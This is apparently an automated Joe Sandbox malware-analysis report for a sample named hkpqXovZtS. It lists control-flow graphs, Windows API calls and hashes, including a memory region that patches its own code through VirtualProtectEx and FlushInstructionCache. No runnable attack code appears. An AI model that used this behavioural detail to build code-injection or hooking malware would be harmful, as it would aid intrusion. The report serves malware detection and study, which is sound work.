                                                                                                                control_flow_graph 1384 2291f17-2291f26 1385 22920e9 1384->1385 1386 2291f2c-2291f33 1384->1386 1388 22920eb-22920f0 1385->1388 1386->1385 1387 2291f39-2291f7d call 2291ac1 call 2291b74 * 2 call 22a05d0 call 22919bf 1386->1387 1399 2291f83-2291fa7 call 2291c53 call 2291de2 1387->1399 1400 22920d4-22920e7 RtlLeaveCriticalSection 1387->1400 1405 2291fad-2291fd6 GetCurrentProcess VirtualProtectEx 1399->1405 1406 22920cf call 2291afe 1399->1406 1400->1388 1407 2291fdc-2291fef VirtualProtectEx 1405->1407 1408 22920af-22920b3 1405->1408 1406->1400 1412 2291ff5-2291ffa 1407->1412 1413 2292094-22920a9 FlushInstructionCache VirtualProtectEx 1407->1413 1410 22920c3-22920cd call 2291edb 1408->1410 1411 22920b5-22920c1 1408->1411 1410->1406 1411->1406 1415 2291ffc-229200b 1412->1415 1413->1408 1415->1415 1417 229200d-229203a call 2291a7c 1415->1417 1420 229203c-229205c call 2291a7c FlushInstructionCache 1417->1420 1421 229205e 1417->1421 1423 2292060-229208e call 2291a7c FlushInstructionCache VirtualProtectEx 1420->1423 1421->1423 1423->1413
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02291AC1: RtlInitializeCriticalSection.NTDLL(022E4050), ref: 02291AD1
                                                                                                                  • Part of subcall function 02291AC1: RtlEnterCriticalSection.NTDLL(022E4050), ref: 02291AF6
                                                                                                                • RtlLeaveCriticalSection.NTDLL(022E4050), ref: 022920D9
                                                                                                                  • Part of subcall function 02291C53: GetCurrentThread.KERNEL32 ref: 02291C7C
                                                                                                                  • Part of subcall function 02291C53: GetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C7F
                                                                                                                  • Part of subcall function 02291C53: GetCurrentThread.KERNEL32 ref: 02291C8B
                                                                                                                  • Part of subcall function 02291C53: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C8E
                                                                                                                  • Part of subcall function 02291C53: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C94
                                                                                                                  • Part of subcall function 02291C53: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C9D
                                                                                                                  • Part of subcall function 02291C53: Thread32First.KERNEL32(00000000,?), ref: 02291CC7
                                                                                                                  • Part of subcall function 02291C53: GetCurrentProcessId.KERNEL32 ref: 02291CD5
                                                                                                                  • Part of subcall function 02291C53: GetCurrentThreadId.KERNEL32 ref: 02291CE1
                                                                                                                  • Part of subcall function 02291C53: Thread32Next.KERNEL32(00000000,0000001C), ref: 02291CFC
                                                                                                                  • Part of subcall function 02291C53: Thread32First.KERNEL32(00000000,0000001C), ref: 02291D3E
                                                                                                                  • Part of subcall function 02291C53: GetCurrentProcessId.KERNEL32 ref: 02291D50
                                                                                                                  • Part of subcall function 02291C53: GetCurrentThreadId.KERNEL32 ref: 02291D5C
                                                                                                                  • Part of subcall function 02291C53: Thread32Next.KERNEL32(00000000,0000001C), ref: 02291D97
                                                                                                                  • Part of subcall function 02291DE2: GetSystemInfo.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,02291FA0,00000000,?), ref: 02291E2D
                                                                                                                  • Part of subcall function 02291DE2: VirtualQuery.KERNEL32(?,?,0000001C,?,00000000,?,?,?,?,?,?,?,?,02291FA0,00000000,?), ref: 02291E55
                                                                                                                  • Part of subcall function 02291DE2: VirtualAlloc.KERNEL32(?,0000006C,00003000,00000020), ref: 02291E90
                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,022910D9,022E3FC0,022910D9), ref: 02291FAE
                                                                                                                • VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000000), ref: 02291FCE
                                                                                                                • VirtualProtectEx.KERNEL32(00000000,00000000,0000006C,00000040,00000000), ref: 02291FE7
                                                                                                                • FlushInstructionCache.KERNEL32(?,0000000C,-0000000C), ref: 02292053
                                                                                                                • FlushInstructionCache.KERNEL32(?,0000002C,00000000), ref: 0229207B
                                                                                                                • VirtualProtectEx.KERNEL32(?,00000000,0000006C,00000000,00000000), ref: 0229208E
                                                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02292097
                                                                                                                • VirtualProtectEx.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 022920A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ThreadVirtual$ProcessProtectThread32$CacheCriticalFlushInstructionSection$FirstNextPriority$AllocCreateEnterInfoInitializeLeaveQuerySnapshotSystemToolhelp32
                                                                                                                • String ID:
                                                                                                                • API String ID: 771826910-0
                                                                                                                • Opcode ID: ecf279583399344bdcee95740a70b0ffd393cd11ed94f9ce18fcf11f73abc6c8
                                                                                                                • Instruction ID: d8c66434fff5f82c2ed2fa6a1b7732cc339a180d64f4e3a658c252c353ad88f1
                                                                                                                • Opcode Fuzzy Hash: ecf279583399344bdcee95740a70b0ffd393cd11ed94f9ce18fcf11f73abc6c8
                                                                                                                • Instruction Fuzzy Hash: BB51B13151430AAFDB21DFA59C84E6FBBEDEF88700F00491DF98992148DB34D955CB62

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 02291B07
                                                                                                                • GetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291B0A
                                                                                                                • GetCurrentThread.KERNEL32 ref: 02291B14
                                                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291B17
                                                                                                                • ResumeThread.KERNEL32(022E446C,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291B2F
                                                                                                                • CloseHandle.KERNEL32(022E446C,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291B3D
                                                                                                                • GetCurrentThread.KERNEL32 ref: 02291B67
                                                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291B6A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$CurrentPriority$CloseHandleResume
                                                                                                                • String ID:
                                                                                                                • API String ID: 3872315302-0
                                                                                                                • Opcode ID: 92c49105eb637d7c00ce5b397a55be25ce90c34b9e5e4b43a8314155d14a4508
                                                                                                                • Instruction ID: 53ef6bd7489dadb1e2e76f71da87e7c7758bc2875096f2dc4f2181c7e436b7a3
                                                                                                                • Opcode Fuzzy Hash: 92c49105eb637d7c00ce5b397a55be25ce90c34b9e5e4b43a8314155d14a4508
                                                                                                                • Instruction Fuzzy Hash: 71F0C932E90114DFCB12BBE5F80CE197B79FF88766F014CA5E1458A011CB359826DB60

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1489 229f78c-229f79d call 229fe20 1492 229f79f-229f7a5 1489->1492 1493 229f7ae-229f7b5 1489->1493 1492->1493 1494 229f7a7-229f7a9 1492->1494 1495 229f7c1-229f7d5 dllmain_raw 1493->1495 1496 229f7b7-229f7ba 1493->1496 1497 229f887-229f896 1494->1497 1499 229f7db-229f7ec dllmain_crt_dispatch 1495->1499 1500 229f87e-229f885 1495->1500 1496->1495 1498 229f7bc-229f7bf 1496->1498 1501 229f7f2-229f804 call 229f97d 1498->1501 1499->1500 1499->1501 1500->1497 1504 229f82d-229f82f 1501->1504 1505 229f806-229f808 1501->1505 1506 229f831-229f834 1504->1506 1507 229f836-229f847 dllmain_crt_dispatch 1504->1507 1505->1504 1508 229f80a-229f828 call 229f97d call 229f6dc dllmain_raw 1505->1508 1506->1500 1506->1507 1507->1500 1509 229f849-229f87b dllmain_raw 1507->1509 1508->1504 1509->1500
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                • String ID:
                                                                                                                • API String ID: 3136044242-0
                                                                                                                • Opcode ID: d34e115dea7e0857dcbe5a6492fb1c33083ebea413e34123c39cfe2b32b01ff8
                                                                                                                • Instruction ID: 6eb0739bfb053eea5e435e62b4364d58f478492e6c5e3e8c427889e7e6092736
                                                                                                                • Opcode Fuzzy Hash: d34e115dea7e0857dcbe5a6492fb1c33083ebea413e34123c39cfe2b32b01ff8
                                                                                                                • Instruction Fuzzy Hash: 64216072D2025AAFDFF19FD5CE44AAE3A6AEB84B94F154025E815E6A18C3318D41CB90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1515 407f5d-407fa1 call 419784 call 419e00 call 401788 call 408867 1524 407fa3 1515->1524 1525 407fb4-407fc3 call 4013a2 1515->1525 1526 407fa5-407faf call 406238 1524->1526 1531 407fc5-407fd4 call 40a2cc 1525->1531 1532 407fde-407fe4 1525->1532 1534 4080ce-4080ed call 401951 1526->1534 1531->1534 1543 407fda-407fdc 1531->1543 1533 407fea-407ff6 1532->1533 1532->1534 1536 408077-408091 call 40724e 1533->1536 1537 407ff8-408012 call 419acb 1533->1537 1546 408093-408097 1536->1546 1547 408099 1536->1547 1548 408026-408061 call 40a3e5 call 406528 call 4095ff 1537->1548 1543->1526 1546->1547 1549 4080a0-4080a6 call 401000 1546->1549 1547->1549 1562 408063-408074 1548->1562 1563 408014-408023 1548->1563 1553 4080ab-4080c5 call 4035d7 call 40747f 1549->1553 1561 4080ca-4080cc 1553->1561 1561->1534 1561->1553 1562->1536 1563->1548
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00407F62
                                                                                                                  • Part of subcall function 00401788: __EH_prolog.LIBCMT ref: 0040178D
                                                                                                                  • Part of subcall function 00401788: _memset.LIBCMT ref: 004018D3
                                                                                                                  • Part of subcall function 00401788: _memset.LIBCMT ref: 004018E2
                                                                                                                  • Part of subcall function 00401788: _memset.LIBCMT ref: 004018F1
                                                                                                                • _wcscpy.LIBCMT ref: 00408006
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$H_prolog$_wcscpy
                                                                                                                • String ID: lB$rar
                                                                                                                • API String ID: 399036908-3996953529
                                                                                                                • Opcode ID: d97c1da7bb0815ee5a3d9d3f0d1e1dcd3877ba055cf6ff2c76cea1c3e7569002
                                                                                                                • Instruction ID: 9ffdf55e66c887a604bdfebc8246e1b1093bd18122925d73c004fbf845f7006d
                                                                                                                • Opcode Fuzzy Hash: d97c1da7bb0815ee5a3d9d3f0d1e1dcd3877ba055cf6ff2c76cea1c3e7569002
                                                                                                                • Instruction Fuzzy Hash: 47418271900229AADF14EFA5CE519EEB7B9AF14304F0040BFE545B3181DB785F89CB69
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0040DFC7
                                                                                                                • _wcscpy.LIBCMT ref: 0040DFE7
                                                                                                                  • Part of subcall function 004109A9: _wcslen.LIBCMT ref: 004109BF
                                                                                                                  • Part of subcall function 004109A9: _wcscpy.LIBCMT ref: 004109D5
                                                                                                                • _wcscpy.LIBCMT ref: 0040E005
                                                                                                                  • Part of subcall function 0040714B: __EH_prolog.LIBCMT ref: 00407150
                                                                                                                  • Part of subcall function 004080F0: __EH_prolog.LIBCMT ref: 004080F5
                                                                                                                  • Part of subcall function 004071F4: __EH_prolog.LIBCMT ref: 004071F9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$_wcscpy$_wcslen
                                                                                                                • String ID: 8C
                                                                                                                • API String ID: 1734755022-2849189062
                                                                                                                • Opcode ID: c63ce43d89374d237abfc7f6ebe7a89fd699cb4061a317db9fe367064d5dfe34
                                                                                                                • Instruction ID: 664881d3c4bc932fb1c9bac00e681757b7716ab8f0d0560bfd10cc2763ccace2
                                                                                                                • Opcode Fuzzy Hash: c63ce43d89374d237abfc7f6ebe7a89fd699cb4061a317db9fe367064d5dfe34
                                                                                                                • Instruction Fuzzy Hash: E71104B6909280EEE705EB59EC16BDD7B60EF46714F1080AFE005722C3CB781A44DB2E
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(riched32.dll,00000000,004349D8,?,?,?,0040FCE4,00000065,00000000,00000064,00000000,sfxname,004349D8,00000000,004349D8,00000800), ref: 00419323
                                                                                                                • LoadLibraryW.KERNEL32(riched20.dll,?,0040FCE4,00000065,00000000,00000064,00000000,sfxname,004349D8,00000000,004349D8,00000800), ref: 0041932C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: riched20.dll$riched32.dll
                                                                                                                • API String ID: 1029625771-3294723617
                                                                                                                • Opcode ID: 665ab825520b37c0db97bfc81c4960f996d6183468ce5798f336c41c404a4750
                                                                                                                • Instruction ID: e45f572e2a77eb575a3180e90dbcab2bf4e842a6890d3c51445a4b0bee5f1722
                                                                                                                • Opcode Fuzzy Hash: 665ab825520b37c0db97bfc81c4960f996d6183468ce5798f336c41c404a4750
                                                                                                                • Instruction Fuzzy Hash: 93F027B1681308BBD320AF96CC06B5AFAE8DF80715F11442FE04093280D6FCA504CB68
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0040178D
                                                                                                                  • Part of subcall function 00405E82: __EH_prolog.LIBCMT ref: 00405E87
                                                                                                                  • Part of subcall function 00405E82: _memset.LIBCMT ref: 00405EC8
                                                                                                                  • Part of subcall function 00405E82: _memset.LIBCMT ref: 00405EE0
                                                                                                                  • Part of subcall function 0040B589: __EH_prolog.LIBCMT ref: 0040B58E
                                                                                                                  • Part of subcall function 0040134B: __EH_prolog.LIBCMT ref: 00401350
                                                                                                                • _memset.LIBCMT ref: 004018D3
                                                                                                                • _memset.LIBCMT ref: 004018E2
                                                                                                                • _memset.LIBCMT ref: 004018F1
                                                                                                                  • Part of subcall function 00419BE4: _malloc.LIBCMT ref: 00419BFE
                                                                                                                  • Part of subcall function 00409DB1: __EH_prolog.LIBCMT ref: 00409DB6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog_memset$_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1088670707-0
                                                                                                                • Opcode ID: a7af4b0fcb8ccc2b2f61d67eb90ddb849b828536c7f3cfa1af008ce627cd1eb4
                                                                                                                • Instruction ID: 8e29203ec00d47c1b604fe7ad50813d6eb700de183f12eb512e72eab7334d0cb
                                                                                                                • Opcode Fuzzy Hash: a7af4b0fcb8ccc2b2f61d67eb90ddb849b828536c7f3cfa1af008ce627cd1eb4
                                                                                                                • Instruction Fuzzy Hash: 1A513B71649B80DEC721DF7D94916DBFAE4AF26300F84497ED0EE93281C3792644CB5A
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(0291111C,0291111C), ref: 00410CBE
                                                                                                                • RtlDeleteCriticalSection.NTDLL(029112B4), ref: 00410CD0
                                                                                                                • CloseHandle.KERNEL32(0000008C), ref: 00410CDC
                                                                                                                • CloseHandle.KERNEL32(00000394), ref: 00410CE4
                                                                                                                  • Part of subcall function 00410B55: WaitForSingleObject.KERNEL32(?,000000FF,00410BEC,?,?,00410CFB,?,?,?,?,?,00410D9A), ref: 00410B5B
                                                                                                                  • Part of subcall function 00410B55: GetLastError.KERNEL32(?,?,?,?,?,00410D9A), ref: 00410B67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$CriticalDeleteErrorLastObjectSectionSingleWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 2350353865-0
                                                                                                                • Opcode ID: c64e8cfa76ad608a2ed120909e57b306d28e56f4a43c03382918d8b8bafd9ee1
                                                                                                                • Instruction ID: 277f3f1e2d4a0ace0a2c9000cfc0bca4c747b97bb868161b2ee0620fb2e87ccd
                                                                                                                • Opcode Fuzzy Hash: c64e8cfa76ad608a2ed120909e57b306d28e56f4a43c03382918d8b8bafd9ee1
                                                                                                                • Instruction Fuzzy Hash: CFF0B476101304EFD7316B74DD41ED6B7A9EF06309F11093EE69A42121CBB7A8D19B68
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog_wcscpy
                                                                                                                • String ID: CMT
                                                                                                                • API String ID: 2825759377-2756464174
                                                                                                                • Opcode ID: 42e281ebb56cf4cb55eccdd6b0302c8ac1737cc6462e7e9bf28d93a2f2a160e6
                                                                                                                • Instruction ID: 4930881b4f68beb89a4a1329027f768b5c4bdd75edb1a457c8ac7b98b7ecdda6
                                                                                                                • Opcode Fuzzy Hash: 42e281ebb56cf4cb55eccdd6b0302c8ac1737cc6462e7e9bf28d93a2f2a160e6
                                                                                                                • Instruction Fuzzy Hash: FAA1C670A04740AFDB21DB68C8847AFBBE5AF46310F14496FE096A72E1C77D6D40CB5A
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00402BA9
                                                                                                                  • Part of subcall function 0040C05E: LoadStringW.USER32(?,-0042E789,00000200), ref: 0040C0AF
                                                                                                                  • Part of subcall function 0040C05E: LoadStringW.USER32(?,-0042E789,00000200), ref: 0040C0C1
                                                                                                                  • Part of subcall function 0040DF6E: GetLastError.KERNEL32(?,0042E76C,004063D7,00000000,%ls,?,?,00000400,?,00000000,?), ref: 0040DF83
                                                                                                                  • Part of subcall function 0040DF6E: __vswprintf_c_l.LIBCMT ref: 0040DFA1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString$ErrorH_prologLast__vswprintf_c_l
                                                                                                                • String ID: lB$lB
                                                                                                                • API String ID: 3756025957-3074592483
                                                                                                                • Opcode ID: 39802627dbcf3c77df7ea3a1c3ab3285a12712d0cd674fe99efb35da79dd01b0
                                                                                                                • Instruction ID: a15070b2b996df6eb1dd145cd97ac7fb9f3ba019e282c3c8317b3d19eb184d3e
                                                                                                                • Opcode Fuzzy Hash: 39802627dbcf3c77df7ea3a1c3ab3285a12712d0cd674fe99efb35da79dd01b0
                                                                                                                • Instruction Fuzzy Hash: CB7158B1504B54AAE725AB71C955BEBB7A4BF01304F00886FE1EB621C2CF7C3945CB59
                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNEL32(6C8B3C3C,022910D9,00000004,00000000,022E3FC0,022910D9,?,022910D9,022E4FB8,0229173D,022910D9,00E1D8E8), ref: 022915A5
                                                                                                                • VirtualProtect.KERNEL32(6C8B3C3C,022910D9,00E1D8E8,00000000,?,022910D9,022E4FB8,0229173D,022910D9,00E1D8E8), ref: 02291602
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID: 0L{
                                                                                                                • API String ID: 544645111-1076991039
                                                                                                                • Opcode ID: a937656abe83b63d0f6ebf39811f5dc41740c05875ee6d8efe4f9c7867802f3e
                                                                                                                • Instruction ID: 8f7a770033b13ac876f13ea7edd2f86985bebac68770c727cc9a726c64bec602
                                                                                                                • Opcode Fuzzy Hash: a937656abe83b63d0f6ebf39811f5dc41740c05875ee6d8efe4f9c7867802f3e
                                                                                                                • Instruction Fuzzy Hash: 2A21CDB29043029FCB10DFA9EC84A36B7F8FB88309F05492DF489CB241E730D954AB64
                                                                                                                APIs
                                                                                                                • _realloc.LIBCMT ref: 0040115B
                                                                                                                  • Part of subcall function 004063A1: __vswprintf_c_l.LIBCMT ref: 004063BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __vswprintf_c_l_realloc
                                                                                                                • String ID: Maximum allowed array size (%u) is exceeded$lB
                                                                                                                • API String ID: 620378156-1794904129
